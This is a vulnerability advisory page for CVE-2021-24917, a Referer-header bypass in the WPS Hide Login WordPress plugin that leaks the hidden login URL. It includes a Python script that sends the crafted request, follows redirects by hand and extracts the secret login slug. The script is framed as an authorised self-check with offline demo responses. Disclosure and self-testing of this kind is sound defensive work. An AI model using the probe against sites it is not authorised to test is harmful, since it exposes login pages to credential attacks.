VYPR
Unrated severity · NVD Advisory · Published Dec 6, 2021 · Updated Aug 3, 2024

WPS Hide Login < 1.9.1 - Protection Bypass with Referer-Header

CVE-2021-24917

Description

The WPS Hide Login plugin before 1.9.1 allows unauthenticated attackers to discover the secret login page by sending a request with a crafted Referer header.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.


Vulnerability

The WPS Hide Login WordPress plugin before version 1.9.1 contains a protection-bypass flaw that discloses the location it is meant to hide. An unauthenticated attacker can learn the secret login page (the custom login slug configured by the site administrator) by requesting /wp-admin/options.php with an arbitrary Referer header value. The plugin's handling of that request depends on the Referer header, and the mishandled check lets the resulting redirect reveal the hidden login URL. All versions prior to 1.9.1 are affected. [1]

Exploitation

No authentication is required. The attack is a single HTTP GET request to /wp-admin/options.php carrying a crafted Referer header (any random string will do). The plugin's logic then answers with a redirect to the secret login page, so the custom login URL appears in the response's Location header; the attacker can then open that page and begin credential attacks against the login form. [1] If the plugin runs on a subdomain and the main domain redirects to that subdomain, requesting /wp-admin/options.php on the main domain can expose the login URL as well, because the redirect chain ends at the same leaking endpoint. [2]
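The probe described above, written as a self-check for a site you are authorised to test. This is an added example for this page, not code from the plugin, WPScan or NVD. The HTTP transport is injectable so the decision logic runs offline against constructed responses; the hostnames in DEMO_RESPONSES are made up, the Referer value is arbitrary (the advisory says any random string works), and the rule used to tell the login redirect apart from an ordinary redirect (a Location carrying WordPress's redirect_to parameter but not pointing at /wp-login.php) is an assumption of this example, not something the page states.

```python
"""Check for CVE-2021-24917 (WPS Hide Login < 1.9.1) on a site you are
authorised to test. Added example for this page; not code from the plugin,
WPScan or NVD. The HTTP transport is injectable, so the decision logic runs
offline against constructed responses (see DEMO_RESPONSES)."""
import http.client
from typing import Callable, Dict, Optional, Tuple
from urllib.parse import parse_qs, urljoin, urlsplit, urlunsplit

# A fetcher sends ONE request and returns (status, Location header or None).
Fetcher = Callable[[str, Dict[str, str]], Tuple[int, Optional[str]]]

PROBE_PATH = "/wp-admin/options.php"
# The advisory says any random Referer triggers the bug; a reserved TLD avoids
# pointing the header at a real host.  Constructed value.
PROBE_REFERER = "https://probe.invalid/"
REDIRECT_STATUSES = {301, 302, 303, 307, 308}


def build_probe(site: str) -> Tuple[str, Dict[str, str]]:
    """URL and headers of the unauthenticated request described in the advisory."""
    p = urlsplit(site)
    url = urlunsplit((p.scheme, p.netloc, PROBE_PATH, "", ""))
    return url, {"Referer": PROBE_REFERER, "User-Agent": "cve-2021-24917-check"}


def stdlib_fetch(url: str, headers: Dict[str, str]) -> Tuple[int, Optional[str]]:
    """Real transport: no cookies, and redirects are NOT followed automatically,
    because the Location header is the finding."""
    p = urlsplit(url)
    cls = http.client.HTTPSConnection if p.scheme == "https" else http.client.HTTPConnection
    conn = cls(p.netloc, timeout=10)
    try:
        conn.request("GET", p.path or "/", headers=headers)
        r = conn.getresponse()
        return r.status, r.getheader("Location")
    finally:
        conn.close()


def leaked_login_url(location: str) -> Optional[str]:
    """Return the hidden login URL (query stripped) if Location discloses it.

    Assumption (not stated on the page): WordPress's auth_redirect() sends the
    browser to the login URL with a redirect_to parameter. A redirect that
    carries redirect_to but does not go to /wp-login.php is therefore the
    plugin's custom slug; a redirect without redirect_to (for example the
    plugin's own 404 slug) discloses nothing.
    """
    loc = urlsplit(location)
    if "redirect_to" not in parse_qs(loc.query):
        return None
    if loc.path.rstrip("/").endswith("/wp-login.php"):
        return None  # stock login page: plugin absent or already patched
    return urlunsplit((loc.scheme, loc.netloc, loc.path, "", ""))


def probe(site: str, fetch: Fetcher = stdlib_fetch, max_hops: int = 3) -> Optional[str]:
    """Send the probe and follow up to max_hops redirects by hand, re-sending the
    crafted Referer each time. Following hops covers the advisory's case where
    the main domain redirects to a subdomain that runs the plugin."""
    url, headers = build_probe(site)
    for _ in range(max_hops):
        status, location = fetch(url, headers)
        if status not in REDIRECT_STATUSES or not location:
            return None
        location = urljoin(url, location)  # Location may be relative
        found = leaked_login_url(location)
        if found:
            return found
        url = location
    return None


# Constructed responses standing in for three sites; none of these hosts exist.
DEMO_RESPONSES: Dict[str, Tuple[int, Optional[str]]] = {
    # Vulnerable: options.php bounces straight to the hidden slug.
    "https://vuln.example/wp-admin/options.php": (
        302, "https://vuln.example/secret-door/?redirect_to=https%3A%2F%2Fvuln.example%2Fwp-admin%2Foptions.php&reauth=1"),
    # Main domain redirects to a subdomain, which then leaks (reference [2] case).
    "https://example.org/wp-admin/options.php": (301, "https://blog.example.org/wp-admin/options.php"),
    "https://blog.example.org/wp-admin/options.php": (
        302, "/private-login/?redirect_to=%2Fwp-admin%2Foptions.php&reauth=1"),
    # Patched: unauthenticated wp-admin request goes to a 404 slug, no redirect_to.
    "https://fixed.example/wp-admin/options.php": (302, "https://fixed.example/404/"),
}


def demo_fetch(url: str, headers: Dict[str, str]) -> Tuple[int, Optional[str]]:
    """Offline stand-in for stdlib_fetch that serves DEMO_RESPONSES."""
    assert headers["Referer"] == PROBE_REFERER
    return DEMO_RESPONSES.get(url, (200, None))


if __name__ == "__main__":
    for site in ("https://vuln.example", "https://example.org", "https://fixed.example"):
        print(site, "->", probe(site, demo_fetch) or "no leak")
```

Run it against a real host by calling probe("https://your-site.example") with the default stdlib_fetch. The transport deliberately never follows redirects on its own and sends no cookies: a client that auto-follows would land on the login page and lose the Location header that is the actual evidence, and a session cookie would turn the request into an authenticated one and mask the bug.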

Impact

Successful exploitation defeats the plugin's only purpose, hiding the login page. The attacker learns the secret login URL and can reach the WordPress login form. This grants no authentication by itself, but it strips away the obscurity layer and re-exposes the form to brute-force and credential-stuffing attempts. The impact is therefore information disclosure of the hidden login page location. [1] Hiding the login URL was never an access control; strong credentials, login rate limiting and multi-factor authentication remain the actual defences against those follow-on attacks.

Mitigation

The vulnerability is fixed in version 1.9.1 of the WPS Hide Login plugin. Update to version 1.9.1 or later; there is no known workaround other than updating. The plugin is available from the WordPress plugin repository. [1]

AI Insight generated on May 27, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products: 2

Patches: 0 (no patches discovered yet)

References: 2

News mentions: 0 (no linked articles in the index yet)